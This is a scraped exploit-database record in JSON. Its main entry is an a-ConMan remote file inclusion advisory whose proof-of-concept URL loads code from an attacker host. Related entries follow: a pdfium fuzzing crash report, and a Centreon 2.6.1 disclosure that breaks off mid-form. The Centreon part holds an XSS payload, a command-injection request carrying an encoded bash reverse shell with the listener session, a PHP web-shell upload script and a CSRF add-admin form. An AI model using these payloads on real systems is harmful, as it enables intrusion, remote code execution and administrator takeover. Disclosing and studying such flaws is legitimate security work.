ID 1337DAY-ID-1195 Type zdt Reporter Matdhule Modified 2006-11-22T00:00:00
Description
Exploit for unknown platform in category web applications
=====================================================================
a-ConMan <= 3.2b (common.inc.php) Remote File Inclusion Vulnerability
=====================================================================
____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/ .OR.ID
ECHO_ADV_61$2006
------------------------------------------------------------------------------
[ECHO_ADV_61$2006] a-ConMan <= v3.2beta Remote File Inclusion
------------------------------------------------------------------------------
Author : Ahmad Maulana a.k.a Matdhule
Date Found : November, 22nd 2006
Location : Indonesia, Jakarta
Critical Lvl : Highly critical
Impact : System access
Where : From Remote
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
a-ConMan (Automated Content Management)
Application : a-ConMan (Automated Content Management)
version : 3.2beta
URL : http://sourceforge.net/projects/a-conman
a-ConMan is a flexible database solution built to categorize and manage your image and video content. Giving you the ability to automate the building and updating for any type of content specific website within seconds. Utilizing one of the most advanced
---------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~~
I found vulnerability at script common.inc.php
-----------------------common.inc.php----------------------
....
<?php
include_once($cm_basedir."/ez_sql.php");
include_once($cm_basedir."/pg2ezsql.php");
// include_once($cm_basedir."/functions.php");
$ver = "3.1.1228";
...
----------------------------------------------------------
Input passed to the "cm_basedir" parameter in common.inc.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.
Proof Of Concept:
~~~~~~~~~~~~~~~
http://target.com/[a-conman_path]/php.incs/common.inc.php?cm_basedir=http://attacker.com/inject.txt?
Solution:
~~~~~~~
- Sanitize variable $cm_basedir on common.inc.php.
---------------------------------------------------------------------------
Shoutz:
~~~
~ solpot a.k.a chris, J4mbi H4ck3r thx for the hacking lesson :)
~ y3dips,the_day,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous,str0ke
~ bius, lapets, BlueSpy, NpR, h4ntu, thama, Fungky
-------------------------------- [ EOF ]----------------------------------
# 0day.today [2018-04-08] #
{"id": "1337DAY-ID-1195", "bulletinFamily": "exploit", "title": "a-ConMan <= 3.2b (common.inc.php) Remote File Inclusion Vulnerability", "description": "Exploit for unknown platform in category web applications", "published": "2006-11-22T00:00:00", "modified": "2006-11-22T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/1195", "reporter": "Matdhule", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-04-08T07:40:28", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "edition": 1, "enchantments": {"score": {"modified": "2016-04-20T01:48:30", "value": 8.3, "vector": "AV:N/AC:L/Au:M/C:C/I:C/A:C/"}}, "hash": "93032f12307181c12889ab8c29c58f09efa7e90451682b4d7d53f8fd818edda1", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "ce07e6cb85d9d5d93a9a79fa3bee1c4a", "key": "modified"}, {"hash": "6ef4de7ea83909505f8c3c666e5bc5c0", "key": "sourceData"}, {"hash": "343c54e448023c2964f3c33d84432b32", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "87e4c1ac2eae173ed2fff554a9c42b96", "key": "sourceHref"}, {"hash": "b011f3f2af327ad89e505bafdcc34bf0", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d4ee49c20ca83e831a0819fb165b899c", "key": "href"}, {"hash": "ce07e6cb85d9d5d93a9a79fa3bee1c4a", "key": "published"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "history": [], "href": "http://0day.today/exploit/description/1195", "id": "1337DAY-ID-1195", "lastseen": "2016-04-20T01:48:30", "modified": "2006-11-22T00:00:00", "objectVersion": "1.0", "published": "2006-11-22T00:00:00", "references": [], "reporter": "Matdhule", "sourceData": "=====================================================================\r\na-ConMan <= 3.2b (common.inc.php) Remote File Inclusion Vulnerability\r\n=====================================================================\r\n\r\n\r\n\r\n____________________ ___ ___ ________\r\n\\_ _____/\\_ ___ \\ / | \\\\_____ \\\r\n | __)_ / \\ \\// ~ \\/ | \\\r\n | \\\\ \\___\\ Y / | \\\r\n/_______ / \\______ /\\___|_ /\\_______ /\r\n \\/ \\/ \\/ \\/ .OR.ID\r\nECHO_ADV_61$2006\r\n\r\n------------------------------------------------------------------------------\r\n[ECHO_ADV_61$2006] a-ConMan <= v3.2beta Remote File Inclusion\r\n------------------------------------------------------------------------------\r\n\r\nAuthor\t\t: Ahmad Maulana a.k.a Matdhule\r\nDate Found\t: November, 22nd 2006\r\nLocation\t: Indonesia, Jakarta\r\nCritical Lvl\t: Highly critical\r\nImpact\t\t: System access\r\nWhere\t\t: From Remote\r\n---------------------------------------------------------------------------\r\n\r\nAffected software description:\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\na-ConMan (Automated Content Management)\r\n\r\nApplication\t: a-ConMan (Automated Content Management)\r\nversion\t\t: 3.2beta\r\nURL\t\t: http://sourceforge.net/projects/a-conman\r\n\r\na-ConMan is a flexible database solution built to categorize and manage your image and video content. Giving you the ability to automate the building and updating for any type of content specific website within seconds. Utilizing one of the most advanced\r\n\r\n---------------------------------------------------------------------------\r\n\r\nVulnerability:\r\n~~~~~~~~~~~~~~\r\n\r\nI found vulnerability at script common.inc.php\r\n\r\n-----------------------common.inc.php----------------------\r\n....\r\n<?php\r\ninclude_once($cm_basedir.\"/ez_sql.php\");\r\ninclude_once($cm_basedir.\"/pg2ezsql.php\");\r\n// include_once($cm_basedir.\"/functions.php\");\r\n$ver = \"3.1.1228\";\r\n\r\n...\r\n----------------------------------------------------------\r\n\r\nInput passed to the \"cm_basedir\" parameter in common.inc.php is not\r\nproperly verified before being used. This can be exploited to execute\r\narbitrary PHP code by including files from local or external\r\nresources.\r\n\r\nProof Of Concept:\r\n~~~~~~~~~~~~~~~\r\n\r\nhttp://target.com/[a-conman_path]/php.incs/common.inc.php?cm_basedir=http://attacker.com/inject.txt?\r\n\r\n\r\nSolution:\r\n~~~~~~~\r\n- Sanitize variable $cm_basedir on common.inc.php.\r\n\r\n---------------------------------------------------------------------------\r\nShoutz:\r\n~~~\r\n~ solpot a.k.a chris, J4mbi H4ck3r thx for the hacking lesson :) \r\n~ y3dips,the_day,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous,str0ke\r\n~ bius, lapets, BlueSpy, NpR, h4ntu, thama, Fungky\r\n \r\n-------------------------------- [ EOF ]----------------------------------\r\n\r\n\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "sourceHref": "http://0day.today/exploit/1195", "title": "a-ConMan <= 3.2b (common.inc.php) Remote File Inclusion Vulnerability", "type": "zdt", "viewCount": 0}, "differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:48:30"}], "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "00157601768b634735774d15ccd18f9e"}, {"key": "href", "hash": "d70f578b59b689007687231d8d3be7b6"}, {"key": "modified", "hash": "ce07e6cb85d9d5d93a9a79fa3bee1c4a"}, {"key": "published", "hash": "ce07e6cb85d9d5d93a9a79fa3bee1c4a"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "343c54e448023c2964f3c33d84432b32"}, {"key": "sourceData", "hash": "53c37c3c95f5886a136ec604fb02f0ec"}, {"key": "sourceHref", "hash": "0e37cf5277e654865a287ccec5ee16d3"}, {"key": "title", "hash": "b011f3f2af327ad89e505bafdcc34bf0"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "8b4247f457fe801fade63b9e2e7ca67df4a0efba67604d8d4b226e84fb2907c8", "viewCount": 0, "enchantments": {"vulnersScore": 8.3}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/1195", "sourceData": "=====================================================================\r\na-ConMan <= 3.2b (common.inc.php) Remote File Inclusion Vulnerability\r\n=====================================================================\r\n\r\n\r\n\r\n____________________ ___ ___ ________\r\n\\_ _____/\\_ ___ \\ / | \\\\_____ \\\r\n | __)_ / \\ \\// ~ \\/ | \\\r\n | \\\\ \\___\\ Y / | \\\r\n/_______ / \\______ /\\___|_ /\\_______ /\r\n \\/ \\/ \\/ \\/ .OR.ID\r\nECHO_ADV_61$2006\r\n\r\n------------------------------------------------------------------------------\r\n[ECHO_ADV_61$2006] a-ConMan <= v3.2beta Remote File Inclusion\r\n------------------------------------------------------------------------------\r\n\r\nAuthor\t\t: Ahmad Maulana a.k.a Matdhule\r\nDate Found\t: November, 22nd 2006\r\nLocation\t: Indonesia, Jakarta\r\nCritical Lvl\t: Highly critical\r\nImpact\t\t: System access\r\nWhere\t\t: From Remote\r\n---------------------------------------------------------------------------\r\n\r\nAffected software description:\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\na-ConMan (Automated Content Management)\r\n\r\nApplication\t: a-ConMan (Automated Content Management)\r\nversion\t\t: 3.2beta\r\nURL\t\t: http://sourceforge.net/projects/a-conman\r\n\r\na-ConMan is a flexible database solution built to categorize and manage your image and video content. Giving you the ability to automate the building and updating for any type of content specific website within seconds. Utilizing one of the most advanced\r\n\r\n---------------------------------------------------------------------------\r\n\r\nVulnerability:\r\n~~~~~~~~~~~~~~\r\n\r\nI found vulnerability at script common.inc.php\r\n\r\n-----------------------common.inc.php----------------------\r\n....\r\n<?php\r\ninclude_once($cm_basedir.\"/ez_sql.php\");\r\ninclude_once($cm_basedir.\"/pg2ezsql.php\");\r\n// include_once($cm_basedir.\"/functions.php\");\r\n$ver = \"3.1.1228\";\r\n\r\n...\r\n----------------------------------------------------------\r\n\r\nInput passed to the \"cm_basedir\" parameter in common.inc.php is not\r\nproperly verified before being used. This can be exploited to execute\r\narbitrary PHP code by including files from local or external\r\nresources.\r\n\r\nProof Of Concept:\r\n~~~~~~~~~~~~~~~\r\n\r\nhttp://target.com/[a-conman_path]/php.incs/common.inc.php?cm_basedir=http://attacker.com/inject.txt?\r\n\r\n\r\nSolution:\r\n~~~~~~~\r\n- Sanitize variable $cm_basedir on common.inc.php.\r\n\r\n---------------------------------------------------------------------------\r\nShoutz:\r\n~~~\r\n~ solpot a.k.a chris, J4mbi H4ck3r thx for the hacking lesson :) \r\n~ y3dips,the_day,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous,str0ke\r\n~ bius, lapets, BlueSpy, NpR, h4ntu, thama, Fungky\r\n \r\n-------------------------------- [ EOF ]----------------------------------\r\n\r\n\r\n\r\n\r\n\n# 0day.today [2018-04-08] #"}
{"result": {"zdt": [{"lastseen": "2018-04-07T23:43:05", "references": [], "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "reporter": "Google Security Research", "published": "2016-01-04T00:00:00", "title": "pdfium CPDF_DIBSource::DownSampleScanline32Bit - Heap Based Out-of-Bounds Read", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-07T23:43:05", "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N/", "value": 4.0}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-01-04T00:00:00", "id": "1337DAY-ID-25757", "href": "https://0day.today/exploit/description/25757", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=625\r\n \r\nThe following crash was encountered in pdfium (the Chrome PDF renderer) during PDF fuzzing:\r\n \r\n--- cut ---\r\n$ ./pdfium_test asan_heap-oob_d08cef_3699_8361562cacee739a7c6cb31eea735eb6 \r\nRendering PDF file asan_heap-oob_d08cef_3699_8361562cacee739a7c6cb31eea735eb6.\r\nNon-linearized path...\r\n=================================================================\r\n==28672==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61800000f7b2 at pc 0x000000ed2cac bp 0x7ffea0af5970 sp 0x7ffea0af5968\r\nREAD of size 1 at 0x61800000f7b2 thread T0\r\n #0 0xed2cab in CPDF_DIBSource::DownSampleScanline32Bit(int, int, unsigned int, unsigned char const*, unsigned char*, int, int, int, int) const core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1479:64\r\n #1 0xece99e in CPDF_DIBSource::DownSampleScanline(int, unsigned char*, int, int, int, int, int) const core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1277:5\r\n #2 0x115235c in CFX_ImageStretcher::ContinueQuickStretch(IFX_Pause*) core/src/fxge/dib/fx_dib_engine.cpp:910:5\r\n #3 0x1151805 in CFX_ImageStretcher::Continue(IFX_Pause*) core/src/fxge/dib/fx_dib_engine.cpp:834:12\r\n #4 0x11831f8 in CFX_ImageTransformer::Continue(IFX_Pause*) core/src/fxge/dib/fx_dib_transform.cpp:409:7\r\n #5 0x117a4a1 in CFX_ImageRenderer::Continue(IFX_Pause*) core/src/fxge/dib/fx_dib_main.cpp:1637:9\r\n #6 0x10986a2 in CFX_AggDeviceDriver::ContinueDIBits(void*, IFX_Pause*) core/src/fxge/agg/src/fx_agg_driver.cpp:1748:10\r\n #7 0x11a32f1 in CFX_RenderDevice::ContinueDIBits(void*, IFX_Pause*) core/src/fxge/ge/fx_ge_device.cpp:471:10\r\n #8 0xe8f1f1 in CPDF_ImageRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:869:12\r\n #9 0xe673bf in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:299:9\r\n #10 0xe67eff in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:328:12\r\n #11 0xe76f12 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13\r\n #12 0xe756c1 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3\r\n #13 0x63dbd7 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) fpdfsdk/src/fpdfview.cpp:752:3\r\n #14 0x63c3af in FPDF_RenderPageBitmap fpdfsdk/src/fpdfview.cpp:507:3\r\n #15 0x4ee0df in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:374:3\r\n #16 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9\r\n #17 0x4f16e9 in main samples/pdfium_test.cc:608:5\r\n \r\n0x61800000f7b2 is located 0 bytes to the right of 818-byte region [0x61800000f480,0x61800000f7b2)\r\nallocated by thread T0 here:\r\n #0 0x4be96c in calloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:56\r\n #1 0x67da0f in FX_AllocOrDie(unsigned long, unsigned long) fpdfsdk/src/../include/../../core/include/fpdfapi/../fxcrt/fx_memory.h:37:22\r\n #2 0xe1c1d6 in CPDF_SyntaxParser::ReadStream(CPDF_Dictionary*, PARSE_CONTEXT*, unsigned int, unsigned int) core/src/fpdfapi/fpdf_parser/fpdf_parser_parser.cpp:2444:13\r\n #3 0xe06543 in CPDF_SyntaxParser::GetObject(CPDF_IndirectObjects*, unsigned int, unsigned int, PARSE_CONTEXT*, int) core/src/fpdfapi/fpdf_parser/fpdf_parser_parser.cpp:2171:12\r\n #4 0xe071a4 in CPDF_Parser::ParseIndirectObjectAt(CPDF_IndirectObjects*, long, unsigned int, PARSE_CONTEXT*) core/src/fpdfapi/fpdf_parser/fpdf_parser_parser.cpp:1400:7\r\n #5 0xe0897f in CPDF_Parser::ParseIndirectObject(CPDF_IndirectObjects*, unsigned int, PARSE_CONTEXT*) core/src/fpdfapi/fpdf_parser/fpdf_parser_parser.cpp:1195:12\r\n #6 0xdd7c93 in CPDF_IndirectObjects::GetIndirectObject(unsigned int, PARSE_CONTEXT*) core/src/fpdfapi/fpdf_parser/fpdf_parser_objects.cpp:1125:12\r\n #7 0xddafdf in CPDF_Object::GetDirect() const core/src/fpdfapi/fpdf_parser/fpdf_parser_objects.cpp:220:10\r\n #8 0xde4960 in CPDF_Dictionary::GetElementValue(CFX_ByteStringC const&) const core/src/fpdfapi/fpdf_parser/fpdf_parser_objects.cpp:594:14\r\n #9 0xd99b9b in CPDF_StreamContentParser::FindResourceObj(CFX_ByteStringC const&, CFX_ByteString const&) core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:1178:25\r\n #10 0xd8d60c in CPDF_StreamContentParser::Handle_ExecuteXObject() core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:696:36\r\n #11 0xd979e1 in CPDF_StreamContentParser::OnOperator(char const*) core/src/fpdfapi/fpdf_page/fpdf_page_parser.cpp:369:7\r\n #12 0xda3491 in CPDF_StreamContentParser::Parse(unsigned char const*, unsigned int, unsigned int) core/src/fpdfapi/fpdf_page/fpdf_page_parser_old.cpp:56:9\r\n #13 0xdb7d0f in CPDF_ContentParser::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_page/fpdf_page_parser_old.cpp:1096:13\r\n #14 0xd01db4 in CPDF_PageObjects::ContinueParse(IFX_Pause*) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:693:3\r\n #15 0xd0568d in CPDF_Page::ParseContent(CPDF_ParseOptions*, int) core/src/fpdfapi/fpdf_page/fpdf_page.cpp:874:3\r\n #16 0x63bbe7 in FPDF_LoadPage fpdfsdk/src/fpdfview.cpp:291:3\r\n #17 0x4edcd1 in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:352:20\r\n #18 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9\r\n #19 0x4f16e9 in main samples/pdfium_test.cc:608:5\r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1479:64 in CPDF_DIBSource::DownSampleScanline32Bit(int, int, unsigned int, unsigned char const*, unsigned char*, int, int, int, int) const\r\nShadow bytes around the buggy address:\r\n 0x0c307fff9ea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c307fff9eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c307fff9ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c307fff9ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c307fff9ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n=>0x0c307fff9ef0: 00 00 00 00 00 00[02]fa fa fa fa fa fa fa fa fa\r\n 0x0c307fff9f00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c307fff9f10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x0c307fff9f20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x0c307fff9f30: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x0c307fff9f40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==28672==ABORTING\r\n--- cut ---\r\n \r\nThe crash was reported at https://code.google.com/p/chromium/issues/detail?id=554151. Attached are two PDF files which trigger the crash.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39162.zip\n\n# 0day.today [2018-04-07] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25757"}, {"lastseen": "2018-04-11T15:02:59", "references": [], "description": "Exploit for php platform in category web applications", "edition": 2, "reporter": "LiquidWorm", "published": "2015-09-27T00:00:00", "title": "Centreon 2.6.1 - Multiple Vulnerabilities", "type": "zdt", "enchantments": {"score": {"modified": "2018-04-11T15:02:59", "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "value": 2.8}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2015-09-27T00:00:00", "id": "1337DAY-ID-24302", "href": "https://0day.today/exploit/description/24302", "sourceData": "Centreon 2.6.1 Stored Cross-Site Scripting Vulnerability\r\n\r\n\r\nVendor: Centreon\r\nProduct web page: https://www.centreon.com\r\nAffected version: 2.6.1 (CES 3.2)\r\n\r\nSummary: Centreon is the choice of some of the world's largest\r\ncompanies and mission-critical organizations for real-time IT\r\nperformance monitoring and diagnostics management.\r\n\r\nDesc: Centreon suffers from a stored XSS vulnerability. Input\r\npassed thru the POST parameter 'img_comment' is not sanitized\r\nallowing the attacker to execute HTML code into user's browser\r\nsession on the affected site.\r\n\r\nTested on: CentOS 6.6 (Final)\r\nApache/2.2.15\r\nPHP/5.3.3\r\n\r\n\r\n10.08.2015\r\n\r\n--\r\n\r\n\r\nPOST /centreon/main.php?p=50102 HTTP/1.1\r\nHost: localhost.localdomain\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost.localdomain/centreon/main.php?p=50102&o=a\r\nCookie: PHPSESSID=qg580onenijim611sca8or3o32\r\nConnection: keep-alive\r\nContent-Type: multipart/form-data; boundary=---------------------------951909060822176775828135993\r\nContent-Length: 1195\r\n\r\n\r\n-----------------------------951909060822176775828135993\r\nContent-Disposition: form-data; name=\"directories\"\r\n\r\nupload\r\n-----------------------------951909060822176775828135993\r\nContent-Disposition: form-data; name=\"list_dir\"\r\n\r\n0\r\n-----------------------------951909060822176775828135993\r\nContent-Disposition: form-data; name=\"filename\"; filename=\"phpinfo.php\"\r\nContent-Type: application/octet-stream\r\n\r\n<?\r\nphpinfo();\r\n?>\r\n-----------------------------951909060822176775828135993\r\nContent-Disposition: form-data; name=\"img_comment\"\r\n\r\n\"><script>alert(1);</script>\r\n-----------------------------951909060822176775828135993\r\nContent-Disposition: form-data; name=\"action[action]\"\r\n\r\n1\r\n-----------------------------951909060822176775828135993\r\nContent-Disposition: form-data; name=\"submitA\"\r\n\r\nSave\r\n-----------------------------951909060822176775828135993\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n2097152\r\n-----------------------------951909060822176775828135993\r\nContent-Disposition: form-data; name=\"img_id\"\r\n\r\n\r\n-----------------------------951909060822176775828135993\r\nContent-Disposition: form-data; name=\"o\"\r\n\r\na\r\n-----------------------------951909060822176775828135993--\r\n\r\n\r\nCentreon 2.6.1 Command Injection Vulnerability\r\n\r\nSummary: Centreon is the choice of some of the world's largest\r\ncompanies and mission-critical organizations for real-time IT\r\nperformance monitoring and diagnostics management.\r\n\r\nDesc: The POST parameter 'persistant' which serves for making\r\na new service run in the background is not properly sanitised\r\nbefore being used to execute commands. This can be exploited\r\nto inject and execute arbitrary shell commands as well as using\r\ncross-site request forgery attacks.\r\n\t\r\n\r\nDesc: The POST parameter 'persistant' which serves for making\r\na new service run in the background is not properly sanitised\r\nbefore being used to execute commands. This can be exploited\r\nto inject and execute arbitrary shell commands as well as using\r\ncross-site request forgery attacks.\r\n\r\n\r\n\r\n10.08.2015\r\n\r\n--\r\n\r\n<<<<<<\r\n\r\n[email\u00a0protected]:~# curl -i -s -k -X 'POST'\r\n-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0'\r\n-H 'Content-Type: application/x-www-form-urlencoded'\r\n-b 'PHPSESSID=bk80lvka1v8sb9ltuivjngo520'\r\n--data-binary $'host_id=14&service_id=19&persistant=1%27%22%600%26%2fbin%2fbash+-i+%3e+%2fdev%2ftcp%2f127.0.0.1%2f6161+0%3c%261+2%3e%261%60%27&duration_scale=s&start=08%2f17%2f2018&start_time=8%3a16&end=09%2f17%2f2018&end_time=10%3a16&comment=pwned&submitA=Save&o=as'\r\n'http://localhost.localdomain/centreon/main.php?p=20218'\r\n\r\n>>>>>>\r\n\r\n[email\u00a0protected]:~# nc -4 -l -n 6161 -vv -D\r\nConnection from 127.0.0.1 port 6161 [tcp/*] accepted\r\nbash: no job control in this shell\r\nbash-4.1$ id\r\nid\r\nuid=48(apache) gid=48(apache) groups=48(apache),494(centreon-engine),496(centreon-broker),498(centreon),499(nagios)\r\nbash-4.1$ uname -a;cat /etc/issue\r\nuname -a;cat /etc/issue\r\nLinux localhost.localdomain 2.6.32-504.16.2.el6.x86_64 #1 SMP Wed Apr 22 06:48:29 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux\r\nCentreon Enterprise Server\r\nKernel r on an m\r\n\r\nbash-4.1$ pwd\r\npwd\r\n/usr/share/centreon/www\r\nbash-4.1$ exit\r\nexit\r\nexit\r\n[email\u00a0protected]:~#\r\n\r\nCentreon 2.6.1 Unrestricted File Upload Vulnerability\r\n\r\n\r\nDesc: The vulnerability is caused due to the improper verification\r\nof uploaded files via the 'filename' POST parameter. This can be\r\nexploited to execute arbitrary PHP code by uploading a malicious\r\nPHP script file that will be stored in the '/img/media/' directory.\r\n\r\n--\r\n\r\n\r\n<html>\r\n<!-- Specified dir is 1337 and filename is shelly.php -->\r\n<!-- Ex: http://localhost.localdomain/centreon/img/media/1337/shelly.php?c=id -->\r\n<body>\r\n<script>\r\nfunction submitRequest()\r\n{\r\nvar xhr = new XMLHttpRequest();\r\nxhr.open(\"POST\", \"http://localhost.localdomain/centreon/main.php?p=50102\", true);\r\nxhr.setRequestHeader(\"Accept\", \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\");\r\nxhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.5\");\r\nxhr.setRequestHeader(\"Content-Type\", \"multipart/form-data; boundary=---------------------------951909060822176775828135993\");\r\nxhr.withCredentials = true;\r\nvar body = \"-----------------------------951909060822176775828135993rn\" +\r\n\"Content-Disposition: form-data; name=\"directories\"rn\" +\r\n\"rn\" +\r\n\"1337rn\" +\r\n\"-----------------------------951909060822176775828135993rn\" +\r\n\"Content-Disposition: form-data; name=\"list_dir\"rn\" +\r\n\"rn\" +\r\n\"0rn\" +\r\n\"-----------------------------951909060822176775828135993rn\" +\r\n\"Content-Disposition: form-data; name=\"filename\"; filename=\"shelly.php\"rn\" +\r\n\"Content-Type: application/octet-streamrn\" +\r\n\"rn\" +\r\n\"x3c?phprn\" +\r\n\"echo \"x3cprex3e\";system($_GET['c']);echo \"x3c/prex3e\";rn\" +\r\n\"?x3ern\" +\r\n\"-----------------------------951909060822176775828135993rn\" +\r\n\"Content-Disposition: form-data; name=\"img_comment\"rn\" +\r\n\"rn\" +\r\n\"peenedrn\" +\r\n\"-----------------------------951909060822176775828135993rn\" +\r\n\"Content-Disposition: form-data; name=\"action[action]\"rn\" +\r\n\"rn\" +\r\n\"1rn\" +\r\n\"-----------------------------951909060822176775828135993rn\" +\r\n\"Content-Disposition: form-data; name=\"submitA\"rn\" +\r\n\"rn\" +\r\n\"Savern\" +\r\n\"-----------------------------951909060822176775828135993rn\" +\r\n\"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"rn\" +\r\n\"rn\" +\r\n\"2097152rn\" +\r\n\"-----------------------------951909060822176775828135993rn\" +\r\n\"Content-Disposition: form-data; name=\"img_id\"rn\" +\r\n\"rn\" +\r\n\"rn\" +\r\n\"-----------------------------951909060822176775828135993rn\" +\r\n\"Content-Disposition: form-data; name=\"o\"rn\" +\r\n\"rn\" +\r\n\"arn\" +\r\n\"-----------------------------951909060822176775828135993--\";\r\nvar aBody = new Uint8Array(body.length);\r\nfor (var i = 0; i < aBody.length; i++)\r\naBody[i] = body.charCodeAt(i);\r\nxhr.send(new Blob([aBody]));\r\n}\r\n</script>\r\n<form action=\"#\">\r\n<input type=\"button\" value=\"Submit request\" onclick=\"submitRequest();\" />\r\n</form>\r\n</body>\r\n</html>\r\n\r\nCentreon 2.6.1 CSRF Add Admin Exploit\r\n\r\nDesc: The application allows users to perform certain actions\r\nvia HTTP requests without performing any validity checks to\r\nverify the requests. This can be exploited to perform certain\r\nactions with administrative privileges if a logged-in user\r\nvisits a malicious web site.\r\n\r\n<html>\r\n<body>\r\n<form action=\"'http://localhost.localdomain/centreon/main.php?p=60301\" method=\"POST\">\r\n<input type=\"hidden\" name=\"contact_alias\" value=\"Testingus\" />\r\n<input type=\"hidden\" name=\"contact_name\" value=\"Fullio\" />\r\n<input type=\"hidden\" 